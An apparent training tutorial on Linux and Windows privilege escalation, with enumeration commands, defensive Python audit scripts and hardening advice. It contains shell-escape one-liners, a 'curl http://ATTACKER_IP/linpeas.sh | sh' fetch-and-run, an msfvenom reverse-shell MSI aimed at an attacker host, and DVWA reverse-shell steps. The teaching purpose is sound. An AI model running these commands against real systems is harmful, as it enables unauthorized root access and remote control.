Privilege Escalation Tutorial: Linux and Windows Complete Guide
Privilege escalation is a critical phase of penetration testing and ethical hacking. Once you have initial access to a system, privilege escalation is how you gain higher privileges (root/admin). This tutorial covers escalation techniques on both Linux and Windows.
What Is Privilege Escalation
Privilege escalation is the attack phase in which an attacker moves from a limited user account to higher privileges. Initial access is usually obtained as a low-privileged user or a service account.
There are two types:
- Vertical privilege escalation (privilege elevation): moving from a low-privilege user to a high-privilege one (root/admin).
- Horizontal privilege escalation: accessing another user's data at the same privilege level.
Linux Privilege Escalation
Initial Enumeration Commands
First, gather information about the system:
```bash
uname -a # Kernel version and OS details
cat /etc/issue # OS version
cat /etc/*release # Release information
hostname # System hostname
id # Current user and groups
whoami # Current username
```
User and Group Enumeration
```bash
id # User ID, group ID and group memberships
whoami # Username
sudo -l # sudo permissions (may prompt for the user's password)
cat /etc/passwd # List of all users
cat /etc/group # All groups
ls -la /home/ # User home directories
ls -la /var/mail/ # Mail files
```
Sudo Permissions Exploitation
```bash
sudo -l
```
This command shows which commands the current user may run with sudo, and which of them need no password (NOPASSWD entries).
GTFOBins (gtfobins.github.io) is the best reference here: it lists the privilege escalation possibilities for each command.
Example: nmap with sudo:
```bash
sudo nmap --interactive
!sh
```
Interactive nmap can yield a root shell. Note that interactive mode exists only in old nmap releases; current versions no longer ship it, so check the installed version before relying on this.
SUID Binary Exploitation
SUID (Set User ID) is a special permission bit: a file that carries it runs with the privileges of its owner rather than those of the user who executes it.
Find SUID binaries:
```bash
find / -perm -4000 -type f 2>/dev/null
find / -uid 0 -perm -4000 2>/dev/null
```
Common exploitable SUID binaries:
- nmap (interactive mode)
- vim (shell access)
- find (-exec)
- bash (-p flag)
- less/more (!/bin/sh)
- perl (-e 'exec "/bin/sh"')
- python (-c 'import os; os.system("/bin/sh")')
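The sudo rules and the SUID list above are what an auditor checks on every host. As an added example that is not part of this tutorial, the Python script below parses a constructed `sudo -l` transcript and a constructed `find / -perm -4000` listing, diffs the SUID list against an assumed baseline, and flags entries that match the shell-capable programs listed above. The user `alice`, host `web01`, the baseline set and the `SHELL_CAPABLE` set are all assumptions made for this example.

```python
from __future__ import annotations
import re

# Programs that can hand out a shell when they run with elevated rights (the
# tutorial's list of commonly abused SUID / sudo targets). The exact set is an
# assumption made for this example, not an exhaustive catalogue.
SHELL_CAPABLE = {"nmap", "vim", "find", "bash", "less", "more", "perl", "python", "python3"}

# Constructed baseline: SUID binaries expected on a freshly installed host.
BASELINE_SUID = {
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su",
    "/usr/bin/mount", "/usr/bin/umount",
}

# Constructed output of `find / -perm -4000 -type f 2>/dev/null` taken on a host
# where someone has set the SUID bit on find and vim.
CURRENT_FIND_OUTPUT = """\
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/su
/usr/bin/mount
/usr/bin/umount
/usr/bin/find
/usr/local/bin/vim.basic
"""

# Constructed output of `sudo -l` for a hypothetical user "alice" on host "web01".
SUDO_L_OUTPUT = """\
Matching Defaults entries for alice on web01:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User alice may run the following commands on web01:
    (ALL) NOPASSWD: /usr/bin/nmap
    (root) /usr/bin/systemctl restart nginx
    (ALL : ALL) ALL
"""

# "(runas) TAG: command" lines of sudo -l; tags such as NOPASSWD: are optional.
SUDO_RULE = re.compile(r"^\s*\(([^)]*)\)\s*((?:[A-Z]+:\s*)*)(.+)$")


def _program_name(path: str) -> str:
    """Map /usr/local/bin/vim.basic -> vim and /usr/bin/python3.11 -> python3."""
    name = path.rsplit("/", 1)[-1]
    return re.split(r"[.\-]", name, maxsplit=1)[0]


def audit_suid(find_output: str, baseline: set[str]) -> dict[str, list[str]]:
    """Diff a SUID listing against the baseline and flag shell-capable entries."""
    current = {line.strip() for line in find_output.splitlines() if line.strip()}
    return {
        "new": sorted(current - baseline),          # appeared since the baseline
        "missing": sorted(baseline - current),      # removed since the baseline
        "shell_capable": sorted(p for p in current if _program_name(p) in SHELL_CAPABLE),
    }


def audit_sudo(sudo_l_output: str) -> list[dict]:
    """Parse sudo -l rules; a rule is risky if it allows ALL or a shell-capable program."""
    rules = []
    for line in sudo_l_output.splitlines():
        m = SUDO_RULE.match(line)
        if not m:
            continue  # Defaults lines, headers and blank lines carry no rule
        runas, tags, command = m.group(1), m.group(2), m.group(3).strip()
        program = command.split()[0]
        rules.append({
            "runas": runas,
            "nopasswd": "NOPASSWD:" in tags,
            "command": command,
            "risky": command == "ALL" or _program_name(program) in SHELL_CAPABLE,
        })
    return rules


if __name__ == "__main__":
    for key, paths in audit_suid(CURRENT_FIND_OUTPUT, BASELINE_SUID).items():
        print(f"{key}: {paths}")
    for rule in audit_sudo(SUDO_L_OUTPUT):
        print(rule)
```

On a real host, feed the script the live output of `find / -perm -4000 -type f 2>/dev/null` and `sudo -l`; the useful signal for a defender is the "new" set (anything not in the image baseline) and any NOPASSWD rule whose program can spawn a shell.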
Cron Jobs Exploitation
```bash
cat /etc/crontab
ls -la /etc/cron.d/
cat /etc/cron.daily/*
```
Find world-writable cron scripts:
```bash
find /etc/cron.d -type f -perm -o+w 2>/dev/null
```
Path hijacking in cron is also possible when a script invokes a command without an absolute path, because cron resolves it through its own PATH.
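One way to turn the cron checks above into a repeatable audit, as an added example rather than code from this tutorial: the script parses a constructed /etc/crontab, flags commands that are resolved through cron's PATH (the path hijacking case) and scripts that are world-writable. File modes come from a constructed dict instead of the filesystem so the example runs offline; the paths, users and modes are assumptions.

```python
import re
import stat

# Constructed /etc/crontab (system format: minute hour dom month dow user command).
CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h  dom mon dow user command
*/5 *  * * *   root  /opt/backup/backup.sh
0 2    * * *   root  cleanup.sh > /var/log/cleanup.log
30 3   * * *   alice /home/alice/sync.sh && /usr/bin/logger sync-done
"""

# Constructed file modes, as `stat -c %a` would report them; this dict stands in
# for the real filesystem so the example runs without root or the real files.
MODES = {
    "/opt/backup/backup.sh": 0o777,   # world-writable script that root executes
    "/home/alice/sync.sh": 0o755,
    "/usr/bin/logger": 0o755,
}

# Five schedule fields, the user, then the command (system crontab / cron.d layout).
CRON_ENTRY = re.compile(r"^(?:\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+)$")
SHELL_BUILTINS = {"cd", "export", "umask"}


def audit_crontab(text, modes):
    """Return (user, program, issue) for commands that can be hijacked or rewritten."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = CRON_ENTRY.match(line)
        if not m:
            continue  # SHELL=, PATH= and other variable assignments
        user, cmd = m.group("user"), m.group("cmd")
        # Each shell segment (a && b; c | d) may start a different program.
        for segment in re.split(r"\s*(?:&&|\|\||;|\|)\s*", cmd):
            tokens = segment.split()
            if not tokens or tokens[0] in SHELL_BUILTINS:
                continue
            program = tokens[0]
            if not program.startswith("/"):
                # Resolved through cron's PATH: a writable PATH directory lets
                # someone plant a same-named file that then runs as `user`.
                findings.append((user, program, "relative path, resolved via cron PATH"))
            elif modes.get(program) is not None and modes[program] & stat.S_IWOTH:
                findings.append((user, program, "world-writable"))
    return findings


if __name__ == "__main__":
    for user, program, issue in audit_crontab(CRONTAB, MODES):
        print(f"[{issue}] {program} runs as {user}")
```

To run this against a real system, replace the `MODES` dict with a lookup that calls `os.stat(path).st_mode`, and extend the PATH check by testing each directory in the crontab's PATH= line with the same world-writable test.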
Kernel Exploits
Kernel exploits are powerful but risky: they can crash the system.
```bash
searchsploit linux kernel <version>
uname -r
```
Search for kernel exploits that match the running kernel version. Important: never test kernel exploits on production systems.
Automated Tools: LinPEAS
LinPEAS automates enumeration and finds privilege escalation vectors (linux-exploit-suggester is a separate script that focuses on kernel exploit suggestions).
Download and run it:
```bash
curl -L http://ATTACKER_IP/linpeas.sh | sh
```
LinPEAS produces colour-coded output that highlights potential vulnerabilities.
Windows Privilege Escalation
Initial Enumeration
Gather system information:
```cmd
systeminfo
echo %username%
hostname
whoami /priv
whoami /all
net user
net localgroup administrators
```
Service Enumeration
Check running services:
```cmd
sc query
tasklist /svc
wmic product get name
```
AlwaysInstallElevated Registry Key
```cmd
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
```
If it is enabled (value 1) in both keys:
```bash
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=ATTACKER LPORT=4444 -f msi -o malicious.msi
msiexec /quiet /qn /i malicious.msi
```
Unquoted Service Paths
Services whose executable path is not enclosed in quotes can be exploited.
```cmd
wmic service get name,displayname,pathname,startmode | findstr /i "Running" | findstr /i "Auto"
sc qc "ServiceName"
```
Example: if the service path is "C:\Program Files\My App\app.exe", an attacker can create "C:\Program.exe" or "C:\Program Files\My.exe" (provided the corresponding directory is writable).
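The candidate paths in the example above follow a mechanical rule: for every space in an unquoted image path, Windows tries the prefix before that space with .exe appended before it reaches the real binary. As an added example (not code from this tutorial), the Python script below parses a constructed `sc qc` transcript for a hypothetical service `MyApp`, decides whether its path is vulnerable, and lists the candidate files and the directories whose ACLs an auditor must check. The service name, path and every field value are constructed.

```python
import re

# Constructed output of `sc qc MyApp` for a hypothetical service whose image
# path contains spaces and is not quoted.
SC_QC_MYAPP = r"""
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: MyApp
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\My App\app.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : My App Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""

# "KEY : value" lines of sc qc output.
SC_FIELD = re.compile(r"^\s*([A-Z_]+)\s*:\s*(.*)$")


def parse_sc_qc(text):
    """Turn the KEY : value lines of `sc qc` output into a dict."""
    cfg = {}
    for line in text.splitlines():
        m = SC_FIELD.match(line)
        if m:
            cfg[m.group(1)] = m.group(2).strip()
    return cfg


def _image_path(pathname):
    """Executable part of BINARY_PATH_NAME: up to the first '.exe'; the rest is arguments."""
    m = re.search(r"\.exe", pathname, re.IGNORECASE)
    return pathname[:m.end()] if m else pathname.split()[0]


def is_unquoted_vulnerable(pathname):
    """True when the image path is not quoted and contains a space."""
    p = pathname.strip()
    if not p or p.startswith('"'):
        return False
    return " " in _image_path(p)


def hijack_candidates(pathname):
    """Files the service control manager would try before the real binary:
    for each space in the image path, the prefix before it plus '.exe'."""
    image = _image_path(pathname.strip())
    return [image[:i] + ".exe" for i, ch in enumerate(image) if ch == " "]


def audit_service(sc_qc_text):
    """Summarise one service: is it vulnerable, and which directories need ACL review."""
    cfg = parse_sc_qc(sc_qc_text)
    path = cfg.get("BINARY_PATH_NAME", "")
    vulnerable = is_unquoted_vulnerable(path)
    candidates = hijack_candidates(path) if vulnerable else []
    return {
        "service": cfg.get("SERVICE_NAME"),
        "runs_as": cfg.get("SERVICE_START_NAME"),
        "vulnerable": vulnerable,
        "candidates": candidates,
        # Directories that must not be writable by low-privileged users.
        "dirs_to_check": sorted({c.rsplit("\\", 1)[0] + "\\" for c in candidates}),
    }


if __name__ == "__main__":
    print(audit_service(SC_QC_MYAPP))
```

The remediation is to quote the path, for example `sc config MyApp binPath= "\"C:\Program Files\My App\app.exe\""` (note the space after `binPath=`), and to keep every directory along the path writable only by administrators; the `dirs_to_check` list is exactly the set to verify with `icacls`.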
Stored Credentials Exploitation
Check saved credentials:
```cmd
cmdkey /list
runas /savecred /user:admin cmd.exe
```
Service Permissions Exploitation
Use the AccessChk tool:
```cmd
accesschk.exe -uwcqv "Authenticated Users" *
```
Look for weak service permissions. If the current user can modify a service, its executable can be replaced.
Automated Tools: WinPEAS
Tools for automating Windows privilege escalation enumeration:
- winpeas.exe
- PowerUp.ps1
- WES-NG (Windows Exploit Suggester Next Generation)
Practical Lab: DVWA Privilege Escalation
Practise these privilege escalation scenarios on DVWA at the Low security level:
Upload Shell and Escalate
Use the DVWA File Upload vulnerability: upload a PHP reverse shell, set up a Metasploit handler and catch the shell, which runs as the www-data user. Then escalate privileges:
```bash
# Linux privilege escalation from www-data
sudo -l
find / -perm -4000 2>/dev/null
cat /etc/passwd
```
Metasploit Meterpreter Escalation
After obtaining a Meterpreter session:
```bash
getuid # Current user
sysinfo # System info
getprivs # Available privileges
getsystem # Automatic privilege escalation
```
getsystem is an automated technique that tries several methods in turn.
Privilege Escalation Methodology
Follow a systematic approach:
Enumerate
Gather information systematically: check users, services, cron jobs, SUID binaries and network configuration.
Identify
Identify potential privilege escalation vectors. Use the GTFOBins and LOLBAS references.
Exploit
Exploit the identified vector in a controlled lab environment. Create a PoC (proof of concept).
Escalate
Gain higher privileges and obtain a root/admin shell.
Document
Document the PoC with screenshots and commands for the report.
Common Privilege Escalation Vectors Summary
Linux
SUID binary misconfigurations are very common. Over-broad sudo permissions are another frequent issue. Cron jobs with writable scripts can be exploited. Kernel exploits work on older kernels. NFS share misconfigurations can also become a vector. Password reuse across services is a common vulnerability too.
Windows
AlwaysInstallElevated registry keys are exploitable. Unquoted service paths can be hijacked. Service binary permissions are often weak. Stored credentials are often accessible. DLL hijacking is common in older applications. Token manipulation and SeImpersonatePrivilege exploitation are also possible.
Prevention Strategies
For System Administrators
Follow the principle of least privilege. Manage sudo configurations carefully. Regular patching is critical. Review the list of SUID binaries regularly. Implement monitoring and logging. Apply security baselines.
For Developers
Follow secure coding practices. Validate input everywhere. Do not keep hardcoded credentials. Set secure file permissions.
Privilege Escalation Tutorial Summary
Privilege escalation is a critical phase of penetration testing. This tutorial covered:
- Linux privilege escalation: SUID, sudo, cron, kernel exploits
- Windows privilege escalation: services, AlwaysInstallElevated, stored credentials
- Automated tools: LinPEAS, WinPEAS, PowerUp
- Practical lab scenarios in DVWA
- A systematic methodology and prevention strategies
Learning privilege escalation requires practice and a systematic approach. TryHackMe and HackTheBox have dedicated privilege escalation machines; work through them. Practise enumeration regularly so that you can identify vectors quickly.
Cyber Defence's ethical hacking course covers privilege escalation comprehensively with hands-on labs. A Metasploit tutorial is also available that teaches post-exploitation techniques and Meterpreter commands in detail. Practical experience is the key to success in this field.

